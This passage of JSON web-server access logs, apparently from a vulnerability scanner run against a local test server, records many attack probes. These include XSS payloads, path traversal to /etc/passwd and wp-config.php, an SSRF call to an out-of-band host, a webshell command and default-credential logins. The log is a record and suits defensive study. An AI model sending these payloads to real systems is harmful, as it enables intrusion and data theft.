(KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/16 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"type=url&data=http%3A%2F%2Fc9v8gc8smpv8b0ng0t00ijn54tfabzdf8.oast.online%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.026","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bzr/branch/branch.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concerto/Login?goto=Central HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/17 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfmc/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oam/server/opensso/sessionservice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configurations HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"{\x22sheet\x22:[\x22.es(*)\x22],\x22time\x22:{\x22from\x22:\x22now-1m\x22,\x22to\x22:\x22now\x22,\x22mode\x22:\x22quick\x22,\x22interval\x22:\x22auto\x22,\x22timezone\x22:\x22Asia/Shanghai\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/timelion/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ViewUserHover.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/18 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /misc.php?action=showpopups&type=friend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/sdcall/Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", 